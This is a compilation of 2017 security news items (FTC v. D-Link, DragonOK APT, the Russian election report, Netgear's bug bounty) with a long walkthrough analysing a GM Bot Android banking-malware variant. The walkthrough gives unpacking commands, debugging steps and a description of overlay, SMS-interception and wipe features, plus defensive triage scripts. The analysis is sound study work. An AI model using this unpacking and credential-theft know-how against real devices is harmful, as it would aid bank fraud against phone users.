D-Link allegedly mishandled its own private key code used to sign into D-Link software and as a result, it was publicly available online for six months.
D-Link allegedly failed to take reasonable steps to prevent command injection, a known vulnerability that lets attackers take control of people’s routers and send them unauthorized commands.
Usually, hackers who find flaws report them to the company, giving it the time needed to solve the problems before publicly disclosing the vulnerability. Over the past year, some hackers decided to disclose unpatched flaws due to the company’s failure to release the security updates needed to fix them.
The tech giant has been accused of failing to take reasonable steps to secure the software for its IoT devices and of conducting practices that are “likely to cause, substantial injury to consumers in the United States.”
This isn’t the first time that IoT manufacturers tell customers their products are totally secure while failing to adopt the necessary security measures.
Earlier in 2016, the FTC filed a lawsuit against Asus claiming that the company had put hundreds of thousands of consumers at risk through a series of critical flaws discovered in its products.
“Hackers are increasingly targeting consumer routers and IP cameras — and the consequences for consumers can include device compromise and exposure of their sensitive personal information,” said Jessica Rich, director of the FTC’s Bureau of Consumer Protection. “When manufacturers tell consumers that their equipment is secure, it’s critical that they take the necessary steps to make sure that’s true.”

China-Linked DragonOK APT Group continues updating tools and tactics
8.1.2017 securityaffairs

The China-linked DragonOK APT continues updating its tools and tactics and has targeted entities in various countries, including Russia and Tibet.
It was September 2014, when security researchers at FireEye spotted for the first time the cyber espionage activities of a Chinese state-sponsored group dubbed DragonOK.

At the time, FireEye discovered two hacking campaigns conducted by distinct groups operating in separate regions of China that seem to work in parallel.

The first team of hackers, named Moafee, targeted military and government organizations that were in some way involved in the South China Sea dispute. The attackers hit different organizations, as explained by the researchers at FireEye in a blog post; the group appears to operate from the Guangdong Province and hit entities working in the defense industry in the United States.

The second team, dubbed DragonOK, conducted corporate espionage operations on high-tech and manufacturing companies in Japan and Taiwan.

DragonOK is back and recently targeted Japanese organizations in several industries, including manufacturing, technology, energy, higher education and semiconductor.

While Japan is considered the main target of the APT, hackers also targeted individuals or organizations in Taiwan, Tibet, and Russia.

According to the experts at Palo Alto Networks, one of the malware families used by the DragonOK APT was dubbed Sysget and was used to target entities in Taiwan.

The Sysget malware was delivered both directly via phishing emails and in RTF documents triggering the CVE-2015-1641 flaw, which in turn leveraged a unique shellcode. The experts observed three distinct new versions of the Sysget malware, each improved to make detection and analysis by security solutions harder.

Palo Alto also observed DragonOK hackers using two other malware families, IsSpace and TidePool.


“IsSpace” is an evolution of the NFlog backdoor used by both DragonOK and Moafee. The second malware TidePool was observed earlier this year in targeted attacks powered by a different Chinese APT group, dubbed Operation Ke3chang.

Back in 2013, the security researchers at FireEye spotted a group of China-linked hackers that conducted an espionage campaign against foreign affairs ministries in Europe. The campaign was named ‘Operation Ke3chang’; the same threat actors were spotted targeting personnel at Indian embassies across the world earlier this year.

DragonOK has now used the TidePool malware in targeted attacks against organizations in Russia and Tibet.

The analysis published by Palo Alto Networks researchers included links between the C&C domains of the various malware used by the DragonOK (i.e. TidePool, IsSpace and Sysget), and other Indicators of Compromise.

“The DragonOK group are quite active and continue updating their tools and tactics. Their toolset is being actively developed to make detection and analysis more difficult. Additionally, they appear to be using additional malware toolsets such as TidePool.” states Palo Alto Networks. “While Japan is still the most-targeted region by this group, they look to be seeking out victims in other regions as well, such as Taiwan, Tibet, and Russia.”

President Putin ordered cyber attacks and propaganda to influence US Election
7.1.2017 securityaffairs Cyber

Putin ordered cyber attacks and propaganda to influence Election. Reading the “Assessing Russian Activities and Intentions in Recent US Elections” Report.
The US Office of the Director of National Intelligence (ODNI) has released an unclassified version of the intelligence community’s findings on activities conducted by the Russian Government in an attempt to influence the 2016 US Presidential Election through cyber attacks and online propaganda.

According to the report, the Russian President Vladimir Putin “ordered” a wide-ranging effort to influence the American vote in favor of President-Elect Donald Trump.
“We assess Russian President Vladimir Putin ordered an influence campaign in 2016 aimed at the US presidential election. Russia’s goals were to undermine public faith in the US democratic process, denigrate Secretary Clinton, and harm her electability and potential presidency. We further assess Putin and the Russian Government developed a clear preference for President-elect Trump. We have high confidence in these judgments,” the report said.
“We also assess Putin and the Russian Government aspired to help President-elect Trump’s election chances when possible by discrediting Secretary Clinton and publicly contrasting her unfavorably to him. All three agencies agree with this judgment. CIA and FBI have high confidence in this judgment; NSA has moderate confidence.”

Russia tasked its cyber army with conducting cyber espionage campaigns against political parties, including the Democratic National Committee (DNC), in 2015. The Kremlin also used an army of online trolls to conduct online propaganda and PSYOPs aimed at spreading fake news and influencing public sentiment.

According to the report released by ODNI, the Russian General Staff Main Intelligence Directorate (GRU), participated in the operations since March of 2016.

“We assess that the GRU operations resulted in the compromise of the personal e-mail accounts of Democratic Party officials and political figures. By May, the GRU had exfiltrated large volumes of data from the DNC,” reads the report.

According to the US intelligence, the mysterious hacker Guccifer 2.0 who passed the stolen information to WikiLeaks was an entity operated by the GRU.

The ODNI report states that Russian hackers have gathered intelligence on the US presidential election and the technology used in it since 2014.
“Since early 2014, Russian intelligence has researched US electoral processes and related technology and equipment. DHS assesses that the types of systems we observed Russian actors targeting or compromising are not involved in vote tallying,” continues the report.

The report also highlights the use of the RT America TV, a Russia-financed channel operated from within the United States, as a messaging tool to undermine faith in the US Government and fuel political protest.

The report confirmed that hackers belonging to the Russian GRU were behind the leak of data exfiltrated from the World Anti-Doping Agency (WADA) database.

Of course, Russia denied claims it interfered with the US Presidential Election.

Analyzing a variant of the GM Bot Android malware
7.1.2017 securityaffairs Android

My friends at CyberBlog decided to analyze the GM Bot Android malware as an exercise, aiming to receive feedback and suggestions from the security community.
The sample explored is confirmed as a variant of the GM Bot Android malware, whose source was released publicly in early 2016. The code appears to have been forked by a second author and has additions that target the Danske Bank MobilePay application and the popular Danish NemID two factor authentication (2FA) system.

This article shows the process of walking through Static and Dynamic analysis to unlock the packed source code for the malware.

We see how even with basic static analysis a full picture of the intent of the malware can be readily assembled, and with a little debugging we can quickly get to readable source code.

As part of my journey into Cyber Security I thought it would be interesting to see how modern mobile malware operates. I chose the following sample at random based on an article here.

File Details
SHA256: 44ed4bbd5cdc13c28992c16e99a7dc58f5f95463e889dd494a433549754f7863
MD5: da88bdcb3d53d3ce7ab9f81d15be8497
A quick Google search for these hashes will lead you to the file used, if you would also like to explore this sample.

The article above demonstrates that the analyst has gone from sample to source code, but it is not clear how this is achieved. There are references to suggest that the code has been packed, but again no information on how it was unpacked for analysis.

This post will break down the process I used to analyse this sample, hopefully with enough detail to provide some tips and guidance for others wishing to attempt similar. The process I followed can be logically broken into the following stages:

Analysis Process
Public Analysis – What can we find out using existing public sources of information? What analysis has already been performed (automated or manual)?
Static Analysis – What can we determine from the sample without actually running it in an emulated environment?
Packer Debugging – Assuming the sample is packed (to frustrate analysis), how do we debug the unpacker to understand what is being loaded /run?
DEX Extraction and De-compilation – Once we have mapped out the function of the unpacker, how do we then recover the main code for the malware and reverse it?
Functional & Dynamic Analysis – once we have the extracted and reversed code, what do we see, and how does this correlate with behavior in a safe emulated environment?
Stage 1 – Public Analysis
First off let’s see what we can find about this in the public domain. Searching for the file hashes on VirusTotal, we see approximately 50% of AV products have identified it as malicious:

VirusTotal Results
However, we also note that all classify it heuristically as a generic strain of malware – either a Trojan, Dropper, Fake Installer etc. Nothing suggests it is in fact GM Bot Android, or any specific type of malware. Other than this we don’t see much from Google with either the SHA256 or MD5 hashes.

The original Security Intelligence article references IBM X-Force research, so this is the next stop – but again nothing immediately obvious with regards to this sample could be located.

A wider search of the internet reveals some history of GM Bot, originally built and sold by Ganga Man on dark web forums. Following a dispute, the source code for both the client APK and the C2 server were released publicly. A copy is hosted here on GitHub and will prove useful for cross referencing with this sample later in the analysis.


Stage 2 – Static Analysis
First up we are going to unpack the APK file using APK tool. This will unzip the contents, as well as providing a disassembly of the DEX code into Smali:

apktool d da88bdcb3d53d3ce7ab9f81d15be8497.apk
The results of this can be seen below and the tool has also provided a human readable version of the AndroidManifest.xml file.

Extracted APK files
First stop is to take a look at the Android Manifest file, that should provide an overview of the components of the application and permissions requested.

Manifest Analysis – AndroidManifest.xml
Android Manifest
Initial analysis shows a broad range of permissions that indicate malicious behavior including permissions to:

control all SMS messages (send, receive, read, write, delete)
list running applications
read the phone’s state, contacts, SD card data
request to be a device administrator enabling remote wiping of the device with no warning to the user
A summarized view of referenced class files for the main application, activities (15) and services (2) can be seen below:

Classes Declared in Manifest -Application, Activities and Services
In addition, we see 4 further classes mapped as Broadcast Receivers which will process event messages (Android system Intents) as shown below:

Broadcast Receiver Classes Declared in Manifest
From this we can see the application is capable of:

Executing code when the phone is powered on (starting the application automatically)
Receive notification when Device Admin is granted, requested or a request to disable admin is received (and hence interfere, or nag the user to enable it)
Receive notification of a new inbound SMS – with high priority flag to ensure the code can intercept it first and potentially stop any further alerts (can be used to steal 2FA tokens)
Before proceeding with any reverse engineering of the code, the next step is to explore the other files in the APK for clues.

Files of interest
The following files were noted as of interest:

File: assets/fytluah.dat
A binary file with no immediately obvious format. Possible code to be unencrypted / unpacked at run time?

File: res/values/strings.xml
English language strings for the application, as shown below:

File: res/values/strings.xml (English Language Resource File)
The strings clearly indicate that this malware targets the capture of victims’ credit card information. It is interesting to note that:

The resource keys here are all in English, suggesting the original developer may be English speaking
There are specific strings that are in Danish, despite this resource file being intended for English language
In addition to English language strings we also see several other targeted countries:
Other Resource Files
File: res/values.xml
This file contains a list of country codes and specifically a group that are “non vbv”. This is understood to mean that they do not use the “Verified by Visa” process which is used to enforce additional verification checks during online purchases. It is likely that the attackers would seek to obtain additional VBV credentials via the malware in order to allow online purchases with the card details (or avoid these countries).

Verified By Visa Targeted Countries
Directory: res/drawable
Images and icons/logos including:

Sample photo of Danish “Nem Id” – https://en.wikipedia.org/wiki/NemID
Icon for Danske Bank mobile pay
Mastercard secure code
Icon for verified by visa
Google play
Flash icon (main application icon)
Additionally there are png images prefixed “overlay_”, indicating a possible use in fraudulent overlay activity.

Decompiling to Java source code
Next we attempt to reverse engineer the DEX file back to original Java source code. For this we use dex2jar as follows to translate the DEX file (in the APK) into a Java Class file archive:

dex2jar da88bdcb3d53d3ce7ab9f81d15be8497.apk
The resulting jar file can then be disassembled using JD-GUI as follows:

java -jar ../../jd-gui-1.4.0.jar da88bdcb3d53d3ce7ab9f81d15be8497_dex2jar.jar
The resulting java classes that we see in JD-GUI show that there are only 4 java classes contained in the application. This is in direct contrast to the 16 different classes we saw declared in the application manifest. This confirms that there must be additional code that is loaded dynamically at run time – it is most likely that these four classes are in fact an unpacker.
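The manifest checks above (risky permissions, boot/device-admin/SMS receivers and their priority) and the declared-versus-decompiled class comparison can be automated; the script below is an added example written for this article, not tooling from the CyberBlog author. The manifest it parses is a constructed sample with hypothetical package and class names, and the set of classes "seen in the DEX" is likewise constructed.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # prefix of every android: attribute

# Permissions the write-up flags, keyed to the capability they grant.
RISKY_PERMISSIONS = {
    "android.permission.SEND_SMS": "control SMS",
    "android.permission.RECEIVE_SMS": "control SMS",
    "android.permission.READ_SMS": "control SMS",
    "android.permission.WRITE_SMS": "control SMS",
    "android.permission.GET_TASKS": "list running applications",
    "android.permission.READ_PHONE_STATE": "read phone state",
    "android.permission.READ_CONTACTS": "read contacts",
}
# Receiver hooks that give boot persistence, device-admin nagging and SMS interception.
INTERESTING_ACTIONS = {
    "android.intent.action.BOOT_COMPLETED": "runs at boot",
    "android.app.action.DEVICE_ADMIN_ENABLED": "device admin hook",
    "android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED": "device admin hook",
    "android.provider.Telephony.SMS_RECEIVED": "intercepts inbound SMS",
}
BIND_DEVICE_ADMIN = "android.permission.BIND_DEVICE_ADMIN"
COMPONENT_TAGS = ("application", "activity", "service", "receiver")

# Constructed sample manifest; package and class names are hypothetical, not the real sample's.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.fakeflash">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.GET_TASKS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:name=".App">
    <activity android:name=".MainActivity"/>
    <activity android:name=".CardOverlay"/>
    <service android:name=".HeartbeatService"/>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".AdminReceiver"
        android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
        <action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def _fqcn(pkg, name):  # manifests may abbreviate com.pkg.Foo as ".Foo"
    return pkg + name if name.startswith(".") else name


def triage_manifest(xml_text):
    root = ET.fromstring(xml_text)
    pkg = root.get("package", "")
    out = {"package": pkg, "permissions": {}, "receivers": [], "components": []}
    for p in root.iter("uses-permission"):
        name = p.get(A + "name", "")
        if name in RISKY_PERMISSIONS:
            out["permissions"].setdefault(RISKY_PERMISSIONS[name], []).append(name)
    for tag in COMPONENT_TAGS:
        out["components"] += [_fqcn(pkg, c.get(A + "name", "")) for c in root.iter(tag)]
    for r in root.iter("receiver"):
        entry = {"class": _fqcn(pkg, r.get(A + "name", "")), "hooks": [], "priority": None,
                 "device_admin": r.get(A + "permission") == BIND_DEVICE_ADMIN}
        for flt in r.iter("intent-filter"):
            if flt.get(A + "priority") is not None:  # high value: sees SMS before the inbox app
                entry["priority"] = int(flt.get(A + "priority"))
            for act in flt.iter("action"):
                label = INTERESTING_ACTIONS.get(act.get(A + "name", ""))
                if label and label not in entry["hooks"]:
                    entry["hooks"].append(label)
        if entry["hooks"] or entry["device_admin"]:
            out["receivers"].append(entry)
    return out


def missing_classes(findings, classes_in_dex):
    """Components declared in the manifest but absent from the decompiled DEX:
    the 16-declared-versus-4-present gap, i.e. code that is loaded at run time."""
    return sorted(set(findings["components"]) - set(classes_in_dex))


if __name__ == "__main__":
    f = triage_manifest(SAMPLE_MANIFEST)
    print(f["permissions"], f["receivers"], sep="\n")
    # Constructed: pretend JD-GUI showed only App and MainActivity.
    print(missing_classes(f, {f["package"] + ".App", f["package"] + ".MainActivity"}))
```

On a real sample, feed it the AndroidManifest.xml that apktool decoded and the class list exported from JD-GUI.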

Unpacker Classes
Examining the code we see that it is heavily obfuscated and has been crafted in a way to prevent clean decompiling of the code. This aside, we can start to get an understanding of the function of these four classes by examining the system classes that are imported (and therefore used) when the application is first executed.

After exporting the java source from JD-GUI and unzipping to a new folder, we can extract the imported classes from these files:

find . -type f -exec grep "^import" {} \; | sort -u
The classes we find are shown below :

Class Imported Class
com.igcfse.enscbo.a com.igcfse.enscbo.b
com.igcfse.enscbo.a java.io.RandomAccessFile
com.igcfse.enscbo.a java.lang.reflect.Constructor
com.igcfse.enscbo.b android.app.Application
com.igcfse.enscbo.b android.content.Context
com.igcfse.enscbo.b com.igcfse.enscbo.a
com.igcfse.enscbo.b java.io.File
com.igcfse.enscbo.b java.lang.reflect.Field
com.igcfse.enscbo.b java.lang.reflect.Method
com.igcfse.enscbo.c android.content.Context
com.igcfse.enscbo.c com.igcfse.enscbo.b
com.igcfse.enscbo.c java.io.FileDescriptor
com.igcfse.enscbo.c java.io.IOException
com.igcfse.enscbo.c java.lang.reflect.Constructor
com.igcfse.enscbo.c java.util.Random
com.igcfse.enscbo.wieroel android.app.Application
com.igcfse.enscbo.wieroel android.content.Context
com.igcfse.enscbo.wieroel com.igcfse.enscbo.b
Essentially we have a very small set of libraries that are being imported and used. These consist of functionality for:

General Android application and context classes (expected and needed for all android apps)
File related classes (RandomAccessFile, File, FileDescriptor) – for access, reading and writing local files
Java reflection classes (Constructor, Field, Method) – for creating new classes and instances and invoking methods dynamically
This confirms the hypothesis that we are most likely dealing with an unpacker that unpacks its executable code from a local file resource (as opposed to pulling it dynamically from the network, for example).

Stage 3 – Unpacker Debugging
As the Java code cannot be readily decompiled (due to protections injected by the malware author) we will instead debug the executable against the Smali assembly code. Smali is a disassembly of the DEX code used by the Dalvik Virtual Machine.

The Smali/Baksmali plugin for Android Studio is required, and then the output from Apktool is imported as a new project. We next set the breakpoints as required across the three classes that we are interested in (a,b,c):

Setting Breakpoints in Android Studio
We will initially debug the calls to interesting reflection methods identified, which are as below:

a.smali (a line that creates a new instance of a class based on a java.lang.reflect.Constructor instance)


b.smali (a line that invokes a method on an object via reflection)


c.smali (a line similar to that described above for a.smali)


Now we install the application to the emulator (via ADB to ensure it doesn’t start automatically as in some emulators).

To enable the debugger to connect to the application, we perform the following prior to starting the application:

Enable developer options by repeatedly clicking the build number in Settings > About device
In developer options, choose “Select debug app” and choose the malicious application – “Adobe Flash”
In developer options, enable the “wait for debugger”
Selecting Debug Application
Now start the application from the launcher, you will be prompted to attach the debugger:

Attaching Debugger
In Android Studio, attach the debugger using the icon. Choose the malicious application process. The debugger then stops at our first breakpoint as shown below:

First Breakpoint Reached
Note you should now set some variables to watch – as per above I have set v0 through v10 and p1 through p3. Our first breakpoint is hit and we see we are about to execute a method by reflection. Noting that we have not yet called newInstance() we can assume this is calling existing (loaded) classes – either one of the four loaded by the application, or some other Android framework classes.

Next we force-step into the method to see which method it is calling (the Smali debugger seems a little buggy and we can’t at this point see the parameters being passed).

Stepping into Reflected Method Call
An initial call to get the current context object, presumably to start retrieving local resources from the APK. We now allow the debugger to continue, and repeat this exercise several times to build up a flow of the reflected method calls:

Context android.context.ContextWrapper.getBaseContext()

//expected 2 arguments, got 1 – error in malware code, or to throw off debugging?
//Several more of these not shown
IllegalArgumentException java.lang.IllegalArgumentException(String s)

void Java.lang.reflect.setAccessible(boolean flag)

File android.app.getDataDir()

// returns /data/user/0/com.kzcaxog.mgmxluwswb/app_ydtjq

ContextImpl android.app.getImpl(Context context)

//filename is fytluah.dat
InputStream android.content.res.AssetManager.open(String fileName)
Pausing here, we can see the code is attempting to load the file that we had previously flagged as of interest in the static analysis section. Continuing we see the file is read, presumably decrypted and then written out again as a jar file:

int android.content.res.AssetManager.read(byte[] b)

//className = java.io.File
Class java.lang.Class.forName(String className)

//args = String “/data/user/0/com.kzcaxog.mgmxluwswb/app_ydtjq/gpyjzmose.jar”
T Java.lang.reflect.Constructor.newInstance(Object.. args)

void java.io.FileOutputStream.write(byte[] b) #25

void java.io.FileOutputStream.close()
Finally a DexClassLoader is invoked to load the additional code into the system:

ClassLoader java.lang.Class.getClassLoader()

//className is dalvik.system.DexClassLoader
java.lang.Class.forName(String className)
Looking at the API for the DexClassLoader we can see that it takes two arguments – the location of the file to load, and a writeable area that it will use to re-write an optimised version of the code for the specific machine architecture – eg the Android Run Time (ART). Further information on this can be seen in the Android API documentation:


Stage 4 – DEX Extraction and Decompiling
We can see the exact location of the jar file in the debugger below, and the next step is to recover this file via ADB command line.

Debugging the Call to the DEXClassLoader
After execution of the classloader, connecting via ADB shell we see the two files, the original and the DEX optimised code:

Extracting the Payload Code
We copy these files to /sdcard/Download (+chmod) and then pull the .jar file to local machine for further analysis with adb pull.

Examining the files
Extracting the jar file we find the classes.dex file.

Repeating the steps to convert this to a jar file using dex2jar and decompiling with JD-GUI, we confirm we now have the full (un-obfuscated) source code for this malware sample.
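Before handing the recovered classes.dex to dex2jar it is worth confirming that the payload is a well-formed DEX and recording its hashes, since a truncated or partially decrypted dump decompiles into nonsense. The script below is an added example written for this article, not the author's tooling; it constructs a minimal header-only DEX and jar in memory as sample input so it runs offline, and the same checks apply unchanged to a jar pulled with adb.

```python
import hashlib
import io
import struct
import zipfile
import zlib

DEX_MAGIC = b"dex\n035\0"   # "dex\n" + version + NUL; 035 is the common version of this era
HEADER_SIZE = 0x70
ENDIAN_CONSTANT = 0x12345678


def verify_dex(data):
    """Parse the DEX header and check its integrity fields.

    checksum  = Adler-32 over everything after the checksum field (offset 12 on);
    signature = SHA-1 over everything after the signature field (offset 32 on)."""
    if len(data) < HEADER_SIZE or data[:4] != b"dex\n" or data[7] != 0:
        raise ValueError("not a DEX file: bad size or magic %r" % bytes(data[:8]))
    (checksum,) = struct.unpack_from("<I", data, 8)
    signature = bytes(data[12:32])
    file_size, header_size, endian_tag = struct.unpack_from("<3I", data, 32)
    # *_ids_size fields sit at 0x38, 0x40, 0x48, 0x50, 0x58; class_defs_size at 0x60.
    strings, types, protos, fields, methods, class_defs = (
        struct.unpack_from("<I", data, off)[0] for off in (0x38, 0x40, 0x48, 0x50, 0x58, 0x60))
    return {
        "version": bytes(data[4:7]).decode("ascii"),
        "file_size": file_size,
        "size_ok": file_size == len(data) and header_size == HEADER_SIZE,
        "endian_ok": endian_tag == ENDIAN_CONSTANT,
        "checksum_ok": checksum == (zlib.adler32(data[12:]) & 0xFFFFFFFF),
        "signature_ok": signature == hashlib.sha1(data[32:]).digest(),
        "strings": strings, "types": types, "methods": methods, "class_defs": class_defs,
        "sha256": hashlib.sha256(data).hexdigest(),  # the payload's own hash, for IoC records
    }


def inspect_payload_jar(jar_bytes):
    """Pull classes.dex out of the jar the unpacker wrote and verify it."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = zf.namelist()
        if "classes.dex" not in names:
            raise ValueError("no classes.dex in jar; entries: %s" % names)
        dex = zf.read("classes.dex")
    info = verify_dex(dex)
    info["entries"] = names
    return info


def build_sample_dex(class_defs=3):
    """Constructed header-only DEX with valid integrity fields (sample data,
    not the malware's payload). Only the fields the checks read are set."""
    hdr = bytearray(HEADER_SIZE)
    hdr[:8] = DEX_MAGIC
    struct.pack_into("<3I", hdr, 32, HEADER_SIZE, HEADER_SIZE, ENDIAN_CONSTANT)
    struct.pack_into("<II", hdr, 0x60, class_defs, HEADER_SIZE)
    hdr[12:32] = hashlib.sha1(hdr[32:]).digest()                         # signature first ...
    struct.pack_into("<I", hdr, 8, zlib.adler32(hdr[12:]) & 0xFFFFFFFF)  # ... then checksum over it
    return bytes(hdr)


def build_sample_jar(dex_bytes):
    """Wrap a DEX in a jar the way the unpacker's output file is laid out."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("classes.dex", dex_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    report = inspect_payload_jar(build_sample_jar(build_sample_dex()))
    for key, value in report.items():
        print("%-13s %s" % (key, value))
```

For a real pull, replace the constructed jar with `open("gpyjzmose.jar", "rb").read()` and treat a failed checksum or signature as a sign the dump is incomplete rather than as a property of the malware.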

Decompiled Source Code
Stage 5 – Dynamic and Functional Analysis
First Installation
Upon initial analysis we can see the codebase bears remarkable similarities to the leaked source identified in the static analysis. However there are significant differences, and the code has been customised to specifically target the Danske Bank MobilePay application.

As the code is basically un-obfuscated, I’ll now briefly walk through the key functionality of this malware, starting from first installation.

First Installation Process Overview
Upon first installation and execution the application will perform two primary functions. It will initially harvest a range of the user’s data, including phone contacts, all SMS messages and other key data, and send this to the C&C server. The C&C server then returns a unique installation identifier that is used for all future communication to uniquely identify the compromised device.

Secondly, the malware will nag the user to accept the software as a device administrator. If the user declines, the request is re-triggered, making it very difficult for most users to escape this screen without accepting. With this permission in place, the malware achieves two objectives:

The application cannot be un-installed by the user easily, without de-activating the device administrator. Attempting to do this will trigger the launching of overlays that prevent removing the device admin
At some point in the future, once further data has been stolen from the phone, the C2 server can issue a command to wipe the device, removing evidence of the infection and restoring the device to a factory state
Ongoing Operations – including after each reboot
Command and Control Process Flows
The malware maintains a regular heartbeat to the C2 server, which provides a mechanism for the attacker to issue specific commands to the device. Each heartbeat contains the installation ID and the current screen status. It is hypothesised that the attacker would ideally choose to execute malicious activities when the screen was off and the user was not watching the phone.

Firstly we see the ability to “lock” and “unlock” the phone. This simulates an Android software update screen, and effectively hides any other activity that is occurring behind the screen overlay (such as sending, receiving or deleting SMS messages). Additionally this could be used to disable the user, and prevent them from using the phone whilst their accounts or cards are being compromised in real time.

Next we see another function that is intended to intercept and forward SMS messages to the C2 server, and specifically trying to remove evidence that they ever existed by deleting them. This is used to steal 2FA credentials.

Next, from a C2 server perspective, we see two “reset” commands. The first, a “soft” reset, is used to reset the internal flag to re-attempt stealing NemID credentials. The second is the “hard” reset that performs an immediate wipe of the device data.

Finally, we see the ability to send an arbitrary SMS message to a mobile defined by the attacker and a function to launch a customised push notification to another application on the device. It was not clear what this could be used for.

SMS Remote Control
SMS Remote Control – “Admining Mode”
By listening for incoming SMS messages the malware could also trigger a fake Android update screen that would then harvest, forward and attempt to delete messages as they arrived on the phone. This mode could be enabled and disabled by customised SMS command messages delivered to the phone via SMS.

Automating Data Theft
Decompiled Code Showing Targeted Applications
As per the original article and many of the indicators from the static analysis, the primary purpose of the application is to steal data by performing overlays on top of legitimate applications. The malware targets three specific classes of applications:

Danske Bank’s MobilePay application, with specific intent to steal Nem ID credentials
Applications that trigger an attempt to steal credit card details via a custom overlay
Applications that trigger an attempt to steal the user’s mobile phone number (possibly for triggering the “admining” mode described above)
Danske Bank MobilePay
Danske Bank MobilePay Overlay Process
Upon launching the MobilePay application the overlay attempts to steal the user’s CPR number (a unique social security type ID), mobile number and NemID pass code. It then asks the user to take a photo of their NemID passbook, containing one time use codes which can be used by the attacker to then log into MobilePay (and other Danish systems) and issue payments.

Stealing Credit Card Details
Credit Card Overlay Process
Upon launching one of the targeted applications, a credit card overlay is displayed with a configurable icon depending on the application launched. After basic card details are collected, the application then attempts to recover the Verified by Visa password for the user. These details are then forwarded to the C2 server.

Stealing Phone Numbers
Phone Number Overlay Process
Finally we see the functionality that is targeted at capturing the user’s phone number, presumably to enable further abuse of the victim’s account via abuse of text message 2FA.

The sample appears to be a specifically customised variant that is being used in a campaign to target the Danske Bank MobilePay application. We see evidence that it is probably not the original GM Bot authors work – the coding style compared with the public source code is different, and the mix of languages in the resource files implies the sample has been adapted in a “quick and dirty” fashion to achieve the objectives.

This is a good example of how, once released, complex code can be quickly and easily forked by less skilled authors, a pattern we also see today with the release of the Mirai botnet code. We quickly see a spread of variants of the codebase that become harder to trace and detect and, importantly, to attribute to any individual or group.

As ever, the best advice to prevent becoming a victim of such malware is to ensure that your phone is not configured to install 3rd party applications, and always review requests for permissions carefully – eg, are they aligned with the expected purpose of the application?

Open Questions
Due to time constraints there are a few further areas I would have liked to explore. I may pick these up in a subsequent post, but for the record they are:

The unpacked code contains super user functionality included from Chainfire’s SuperSU application. It’s not clear how or where this is used; no apparent attempt at rooting the device was seen in the unpacked code.
The debugger failed to return from the call to unpack the payload code. It is not clear if any further reflected actions were performed beyond this.
Given key indicators in the codebase, is it possible to search for and locate other similar samples, or perhaps identify further C2 infrastructure?
Any constructive feedback or comments most welcome.

About the author, the owner of the CyberBlog

I am an experienced IT consultant with a broad range of experience across different disciplines from development to large-scale Project Management. I have a passion for all things Cyber related but do not currently work in a Cyber related industry or role. I welcome and encourage all feedback!

FTC Sues D-Link Over Failure to Secure Its Routers and IP Cameras from Hackers
6.1.2017 thehackernews

The United States' trade watchdog has sued Taiwan-based D-Link, alleging that lax security left its products vulnerable to hackers.
The Federal Trade Commission (FTC) filed a lawsuit (pdf) against D-Link on Thursday, arguing that the company failed to implement necessary security protection in its routers and Internet-connected security cameras that left "thousands of consumers at risk" to hacking attacks.
The move comes as cyber criminals have been hijacking poorly secured internet-connected devices to launch massive DDoS attacks that can force major websites offline.
Over two months back, a nasty IoT botnet, known as Mirai, was found infecting routers, webcams, and DVRs built with weak default passwords and then using them to DDoS major internet services.

The popular Dyn DNS provider was one of the victims of a Mirai-based attack that knocked down much of the internet for many users.
To combat this issue, on the one hand, the popular networking equipment provider Netgear has launched a bug bounty program, inviting researchers and hackers to find and responsibly report security flaws in its hardware, mobile apps, and APIs for cash rewards ranging from $150 to $15,000.
But on the other hand, D-Link has been accused of several FTC Act violations, including:
Falsification about security in its router and IP camera user interfaces and promotional materials.
Falsely claiming that reasonable measures have been taken to protect its devices against well-known and easily preventable security flaws, like "hard-coded" user credentials and command injection flaws, which would allow any remote attacker to gain unauthorized access to its devices.
Failure to secure its software.
According to the complaint filed in San Francisco federal court, D-Link's insecure products allowed hackers to "monitor a consumer’s whereabouts to target them for theft or other crimes."

Several security researchers and hackers found serious flaws in D-Link products over the past year, and while some were satisfied with the company addressing the issue, others disclosed unpatched flaws due to its failure to release firmware updates in time.
In response to the complaint, D-Link released a statement saying that the charges brought against it are "unwarranted and baseless" and that the company will "vigorously defend itself."
The FTC "fails to allege, as it must, that actual consumers suffered or are likely to suffer actual substantial injuries," D-Link added.
Due to the rise in IoT threats, the Commission is taking steps to protect Internet-of-Things devices.
The FTC introduced guidelines back in 2015 intended to secure IoT devices, and recently it also launched a "prize competition" for the public with the aim of finding a technical solution for securing IoT devices. The winner of the contest will get $25,000 in prize money.

Netgear launches Bug Bounty Program for Hacker; Offering up to $15,000 in Rewards
6.1.2017 thehackernews Hacking
It might be the easiest bug bounty program ever.
Netgear launched on Thursday a bug bounty program to offer up to $15,000 in rewards to hackers who will find security flaws in its products.
Since criminals have taken aim at the rapidly growing threat surface created by millions of new Internet of Things (IoT) devices, it has become crucial to protect routers, which hold the keys to the kingdom: they connect the outside world to the IP networks that run these connected devices.

To combat this issue, Netgear, one of the biggest networking equipment providers in the world, has launched a bug bounty program focusing on its products, particularly routers, wireless security cameras and mesh Wi-Fi systems.
Bug bounty programs are cash rewards given by companies or organizations to white hat hackers and researchers who hunt for serious security vulnerabilities in their websites or products and then responsibly disclose them so that a patch can be released.
Bug bounties are designed to encourage security researchers, hackers and enthusiasts to responsibly report the vulnerabilities they discover, rather than selling or exploiting them.
